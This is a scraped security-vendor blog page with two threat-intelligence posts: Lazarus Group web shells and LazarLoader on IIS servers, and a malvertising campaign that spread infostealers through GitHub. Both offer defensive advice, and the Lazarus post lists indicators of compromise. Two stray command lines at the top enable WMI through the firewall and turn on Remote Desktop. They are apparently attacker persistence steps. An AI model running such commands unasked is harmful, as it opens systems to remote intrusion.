netsh advfirewall firewall set rule group=”windows management instrumentation (wmi)” new enable=yes
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

 

Lazarus Hackers Exploiting IIS Servers: How to Protect Your Organization

Lazarus Hackers Exploiting IIS Servers: How to Protect Your Organization

by | Mar 14, 2025 | News, Blogs

DOWNLOAD PDF VERSION

Overview

The Lazarus Group, a notorious state-sponsored hacking collective, is once again making headlines with their latest campaign targeting South Korean web servers. By breaching Microsoft IIS servers, these cybercriminals deploy ASP-based web shells to establish initial command and control (C2) infrastructure, making it easier to orchestrate sophisticated attacks. These incidents, first identified in January 2025, signal a dangerous evolution of techniques previously observed in mid-2024.LAZARUS HACKERS EXPLOITING IIS SERVERS_THUMBNAIL

For businesses and cybersecurity professionals, this attack wave is a stark reminder of the growing need for robust defense strategies. At Blackswan Cybersecurity, we specialize in proactive threat intelligence and advanced security solutions designed to detect, mitigate, and prevent threats like these before they compromise critical assets.

Understanding the Lazarus Attack Chain

Lazarus has a consistent history of leveraging compromised legitimate web servers to establish their attack framework. In the latest wave of attacks, researchers at AhnLab Security Intelligence Center (ASEC) found that the hackers installed multiple ASP-based web shells on vulnerable IIS servers. These include a modified version of the “RedHat Hacker” web shell, along with additional malicious scripts like “file_uploader_ok.asp” and “find_pwd.asp.” These tools grant attackers extensive capabilities, such as file manipulation, process control, and even SQL query execution.

REDHAT HACKER WEB SHELL

REDHAT HACKER WEB SHELL

Figure 1. RedHat Hacker web shell

These web shells employ advanced obfuscation techniques, making them difficult to detect and analyze. A key feature of their malicious scripts includes encryption mechanisms that verify initialization packets and obscure critical command execution paths. This increasing level of sophistication highlights the persistent and adaptive nature of the Lazarus Group’s operations.

How Lazarus Deploys Its Malware

Beyond web shells, the attackers also deploy LazarLoader malware, which is specifically designed to download and execute additional payloads in memory using advanced encryption techniques. Their infection chain follows a structured process:

  1. Web Shell Installation – Malicious ASP-based scripts are uploaded to vulnerable IIS servers.
  2. Malware Deployment – LazarLoader is executed via the IIS web server process (w3wp.exe), allowing attackers to maintain stealth and persistence.
  3. Privilege Escalation – A sophisticated malware component named “sup.etl” enables User Account Control (UAC) bypass to escalate privileges and execute malicious commands.

INSTALLATION LOG OF LAZARLOADER

Protecting Your Organization from IIS Server Exploits

With Lazarus continuously refining its tactics, organizations must take a proactive approach to security. Here’s how Blackswan Cybersecurity can help:

  1. Proactive Threat Hunting & Incident Response

Powered by our North Texas-based Cyber Fusion Center, Blackswan’s advanced threat detection and incident response teams continuously monitor the evolving threat landscape, ensuring early identification of malicious activity. We deploy cutting-edge behavioral analytics to spot anomalous behavior that could indicate an ongoing compromise.

  1. Secure Web Server Configurations

Properly securing IIS servers is crucial in preventing unauthorized access. Blackswan Cybersecurity helps businesses implement:

  • Regular vulnerability assessments and penetration testing
  • Strict access controls and multi-factor authentication (MFA)
  • Secure coding practices to prevent file upload vulnerabilities 
  1. Advanced Endpoint & Network Protection

With Lazarus leveraging sophisticated obfuscation techniques, traditional security solutions may fall short. Blackswan provides:

  • AI-powered malware detection and response
  • Next-gen endpoint protection with real-time threat analysis
  • Deception technology to detect and mitigate hidden threats
  1. Employee Training & Awareness

Human error remains a significant factor in cyber breaches. Our security awareness training programs equip employees with the knowledge to recognize social engineering attacks and prevent accidental security lapses.

  1. Continuous Monitoring & Threat Intelligence

Blackswan Cybersecurity integrates 24/7 security monitoring with advanced threat intelligence feeds to detect Lazarus group indicators of compromise (IOCs). Our threat intelligence teams provide real-time alerts on emerging threats, ensuring your organization stays ahead of cyber adversaries.

Indicators of Compromise File Detection
·        0620fa617bc9ef32b93adcf40fe291a4

·        0734a2c3e827ccf558daf48290d06d8c

·        41ffc15c24259156db000af297c71703

·        89921e5f39407a5e63df013468181991

·        adabf920682fac1e6a81e655b1182590

 

 ·        Trojan/ASP.Proxy.SC198862 (2025.01.16.02)

·        WebShell/ASP.Generic (2025.01.20.02)

·        WebShell/ASP.Generic (2025.01.20.02)

·        WebShell/ASP.Generic (2025.01.17.01)

·        Trojan/Win.LazarLoader.C5730315 (2025.02.14.03)

·        Trojan/Win.LazarLoader.R692195 (2025.02.14.03)

·        Trojan/Win.UACMe.R455616 (2021.12.28.00)

Conclusion

The Lazarus Group’s latest attacks serve as a reminder that no organization is immune to advanced cyber threats. By leveraging proactive security measures, organizations can defend against persistent threat actors targeting critical infrastructure.

Blackswan Cybersecurity is committed to safeguarding businesses from state-sponsored attacks with tailored cybersecurity solutions that offer real-time threat mitigation and comprehensive defense strategies.

Is your organization secure? Contact Blackswan Cybersecurity to discuss, or take our free vulnerability assessment to understand your current security posture better and stay one step ahead of cybercriminals.

References

  1. https://securityonline.info/lazarus-breaches-iis-web-shells-evolving-c2-tactics-unveiled/
  2. https://cybersecuritynews.com/lazarus-hackers-exploiting-iis-servers/
  3. https://asec.ahnlab.com/en/86687/

Malvertising Strikes Again: How Cybercriminals Used GitHub to Infect 1M Windows Users

Malvertising Strikes Again: How Cybercriminals Used GitHub to Infect 1M Windows Users

by | Mar 13, 2025 | News, Blogs

DOWNLOAD PDF VERSION

In the ever-evolving landscape of cyber threats, malicious actors are continuously finding new ways to infiltrate systems and steal valuable data. The latest revelation from Microsoft highlights a sophisticated malvertising attack that leveraged GitHub to distribute infostealing malware to nearly one million Windows users. This incident underscores the growing threat of malvertising and the urgent need for organizations to strengthen their cybersecurity posture.MALVERTISING GITHUB BREACH

The Threat: A Multistage Malvertising Campaign

This cyberattack was no ordinary malware campaign. Cybercriminals embedded malicious advertising (malvertising) redirectors within illegal streaming websites, leading unsuspecting users to GitHub, where malware payloads were hosted. The attackers employed a multi-layered redirection strategy, making it difficult for security solutions to detect and neutralize the threat before it reached end users.

Once the initial malware gained a foothold on a compromised device, it executed additional files using a modular, multistage approach. These files enabled system reconnaissance, established persistence, and exfiltrated sensitive data. The identified payloads included Lumma and Doenerium stealers—malicious programs designed to harvest sensitive information from victims’ systems.

Cybercriminals Behind the Attack

Microsoft has attributed this campaign to a threat actor group tracked as Storm-0408, known for using phishing, search engine optimization (SEO) manipulation, and malvertising techniques to distribute information-stealing malware and remote access tools. The attackers’ use of malvertising within streaming websites highlights how they capitalize on high-traffic platforms to maximize their impact.

These activities are believed to be part of a broader Malware-as-a-Service (MaaS) ecosystem, where attackers deploy prebuilt malvertising kits to distribute stealers, ransomware, and banking Trojans. As cybercriminals continue to refine their tactics, organizations must remain vigilant against similar emerging threats.

How Businesses Can Protect Themselves

Blackswan Cybersecurity is committed to helping organizations defend against advanced cyber threats like malvertising-based malware campaigns. Here are key measures to enhance your organization’s security posture:

  1. Implement Advanced Endpoint Protection – Deploy endpoint detection and response (EDR) solutions with proactive defense mechanisms to detect and block malicious activities before they escalate.
  2. Educate Employees on Malvertising Risks – Human error remains a primary entry point for cyber threats. Training staff to recognize and avoid suspicious ads and websites is critical in preventing compromise.
  3. Enhance Web and Network Security – Utilize robust web filtering and network security solutions to block access to known malicious sites and prevent unwanted redirections.
  4. Monitor for Anomalous Activities – Implement continuous monitoring and threat intelligence to detect unusual network behavior that could indicate a security breach.
  5. Keep Software Updated – Ensure that all operating systems, applications, and security software are up to date to minimize vulnerabilities exploited by attackers.

Stay Ahead of Cyber Threats with Blackswan Cybersecurity

At Blackswan Cybersecurity, we specialize in providing cutting-edge security solutions to protect businesses from evolving cyber threats. With a proactive approach to threat intelligence, incident response, and cybersecurity training, we help organizations build robust defenses against advanced cyberattacks.

The GitHub-hosted malware campaign is a stark reminder that cybercriminals will continue to leverage sophisticated attack techniques to infiltrate systems. Don’t wait until it’s too late—fortify your defenses today with Blackswan Cybersecurity.

Ready to secure your business against malvertising threats? Contact us today to learn how we can help safeguard your digital assets.